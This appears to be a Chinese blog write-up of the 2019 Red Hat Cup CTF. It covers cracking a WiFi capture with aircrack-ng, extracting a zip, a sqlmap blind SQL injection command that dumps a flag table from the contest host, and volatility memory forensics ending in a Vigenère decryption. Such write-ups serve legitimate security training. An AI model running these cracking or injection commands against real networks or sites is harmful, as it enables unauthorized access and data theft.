第三届红帽杯网络安全攻防大赛

2019-11-26 17:11:00
ctf - wp - 红帽杯

0x00签到题

填问卷。

0x01恶臭的数据包

操作内容

野兽前辈想玩游戏,但是hacker妨碍了他连上无线网,前辈发出了无奈的吼声。

下载地址:https://share.weiyun.com/5Vl4h1A

先是一个无线网包,查阅发现https://blog.csdn.net/MuMuLee_/article/details/88937391。

先是在wireshark中发现ESSID为:mamawoxiangwantiequan

用aircrack-ng跑出wifi密码aircrack-ng -w 1.txt cacosmia.pcap为12345678

还原出http流量包airdecap-ng -e mamawoxiangwantiequan-p 12345678 cacosmia.pcap

导出http对象然后对其中一个文件进行文件分离获取1.zip,需要密码。

从其中一个流量包获得提示:他将密码设为了之前ping过的站点。

使用wireshark统计已解析地址:

尝试后发现zip密码为:26rsfb.dnslog.cn

FLAG值

flag{f14376d0-793e-4e20-9eab-af23f3fdc158}

0x02Broadcast

操作内容

白给

flag值

flag{fa0f8335-ae80-448e-a329-6fb69048aae4}

0x03easyweb

操作内容

查找:

http://f912e459a2a9459fb14e0b0ab4c4dda7c8b4697b57f84552.changame.ichunqiu.com/App

有日志记录,发现有sql注入点:index.php?s=api/lt/gbooklist&orderby=

是一个布尔型盲注,直接用sqlmap跑,最后payload:

python sqlmap.py -u "http://f912e459a2a9459fb14e0b0ab4c4dda7c8b4697b57f84552
.changame.ichunqiu.com/index.php?s=api/lt/gbooklist&orderby=1" --technique=B --tamper between --columns -T fl4g -C flaag --dump

flag值

flag{ee0b19e5-f35b-4ffe-8135-d380ee23574e}

0x04Advertising for Marriage

操作内容

给了一个raw后缀的文件,比赛时不知道怎么搞,后来看wp才知道这个是一个win镜像,这道题考的是内存取证。

使用内存取证工具volatility:

volatility -f <xxx.img> --profile=<运用的东西> <插件名字> <各种命令>

首先查看配置文件:

volatility -f 1.raw imageinfo

Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)

后续命令都要指定profile=配置文件:

volatility -f 1.raw --profile=WinXPSP2x86 cmd

使用pslist命令查看进程:

发现一个notepad进程,查看其内容:

volatility notepad -f 1.raw profile=WinXPSP2x86

输出:

hint:????needmoneyandgirlfirend

再扫一下文件看看有没有什么图片之类的:

volatility -f 1.raw --profile=WinXPSP2x86 filescan|grep -E 'jpg|png|jpeg|bmp|gif'

0x00000000020d5190 1 0 R--rwd \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\Administrator.bmp 0x000000000247c1a8 1 0 R--rwd \Device\HarddiskVolume1\WINDOWS\Web\Wallpaper\Bliss.bmp 0x000000000249ae78 1 0 R--r-- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\vegetable.png 0x0000000002511c70 1 0 R--rwd \Device\HarddiskVolume1\WINDOWS\ime\IMJP8_1\DICTS\imjpgn.grm

将文件dump下来:

volatility -f 1.raw --profile=WinXPSP2x86 dumpfiles -Q 0x000000000249ae78 --dump-dir=./ctf

发现图片是png,修改一下长宽。

发现打了码,用ps也没办法去除,只能重新找线索。

https://segmentfault.com/a/1190000018813033

提取mspaint进程,后缀名改为data后使用gimp打开。

图像类型调为rgb alpha,高579,宽960,对图形镜像旋转后取得hint前几位b1cx

hint连起来就是b1cxneedmoneyandgirlfirend

对图片进行lsb,然后解密

python lsb.py extract 1.png 123.png b1cxneedmoneyandgirlfirend

得:

VmlyZ2luaWEgY2lwaGVydGV4dDpnbnh0bXdnN3IxNDE3cHNlZGJzNjI1ODdoMA==

Virginia ciphertext:gnxtmwg7r1417psedbs62587h0

b1cxneedmoneyandgirlfirend去掉数字后作为密钥,维吉尼亚解密即可得flag

flag值

flag{d7f1417bfafbf62587e0}



本文原创于HhhM的博客,转载请标明出处。



CopyRight © 2019-2020 HhhM
Power By Django & Bootstrap
已运行
粤ICP备19064649号